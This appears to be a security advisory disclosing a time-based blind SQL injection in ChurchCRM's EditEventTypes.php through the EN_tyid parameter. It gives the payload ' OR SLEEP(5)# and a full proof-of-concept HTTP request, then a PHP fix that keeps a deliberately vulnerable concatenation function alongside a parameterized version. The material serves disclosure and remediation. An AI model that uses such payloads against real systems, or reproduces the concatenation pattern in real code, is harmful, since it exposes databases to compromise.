Description
The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.
This endpoint can be reached through the following menu path: Events - List Event Types - Edit Event Types - Save Name. The EN_tyid parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping. This allows an attacker to inject arbitrary SQL through the parameter and have the database execute it.
Proof of Concept
The time-based injection is demonstrated by triggering a response delay with the MySQL SLEEP() function.
Affected Parameter: EN_tyid
Payload: ' OR SLEEP(5)#
POST /churchcrm/EditEventTypes.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://localhost:8888
Connection: close
Referer: http://localhost:8888/churchcrm/EditEventTypes.php
Cookie: CRM-2c90cf299230a50dab55aee824ed9b08=10amb7tfpmsvp76h7kcqtggqf3
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
EN_tyid=1'+OR+SLEEP(5)%23&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=10%3A30%3A00&newCountName=
Root Cause
The user-supplied value of the EN_tyid parameter is not sanitized and is placed directly into the query through string concatenation. https://github.com/ChurchCRM/CRM/blob/master/src/EditEventTypes.php#L33,L71
Recommendation
Avoid building the SQL query by direct string concatenation of user input. Use parameterized (prepared) queries, and validate or sanitize the input as well.
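To illustrate the root cause and the recommended fix, the following is an added example and not ChurchCRM's own EditEventTypes.php code: a hypothetical handler showing the concatenation pattern beside a parameterized PDO equivalent. The table and column names (event_types, ety_id, ety_name) and the function names are assumptions.

```php
<?php
// Added example: a hypothetical handler, not ChurchCRM's EditEventTypes.php.
// Table/column names (event_types, ety_id, ety_name) are assumptions.

// VULNERABLE pattern (shown for contrast only, never called below): the
// request value is concatenated straight into the query string, so the
// input becomes part of the SQL statement itself.
function updateEventTypeNameVulnerable(PDO $db, string $tyid, string $name): void
{
    $sql = "UPDATE event_types SET ety_name = '" . $name
         . "' WHERE ety_id = '" . $tyid . "'";
    $db->exec($sql);
}

// HARDENED: validate the identifier, then bind both values as parameters.
// The database receives the query text and the data separately, so the
// input can never change the statement's structure.
function updateEventTypeNameSafe(PDO $db, string $tyid, string $name): bool
{
    // ety_id is expected to be a positive integer; reject anything else.
    if (!ctype_digit($tyid)) {
        return false;
    }
    $stmt = $db->prepare('UPDATE event_types SET ety_name = :name WHERE ety_id = :id');
    $stmt->bindValue(':id', (int) $tyid, PDO::PARAM_INT);
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    return $stmt->execute();
}

// Usage with an in-memory SQLite database and constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE event_types (ety_id INTEGER PRIMARY KEY, ety_name TEXT)');
$db->exec("INSERT INTO event_types VALUES (1, 'Service')");

// A non-numeric identifier is rejected before any query is built.
$rejected = updateEventTypeNameSafe($db, "1' OR SLEEP(5)#", 'NewEvent');
// A well-formed identifier is bound as an integer and the row is updated.
$updated  = updateEventTypeNameSafe($db, '1', 'NewEvent');

echo $rejected ? "unexpected: malformed id accepted\n" : "malformed id rejected\n";
echo $updated ? "row updated\n" : "update failed\n";
```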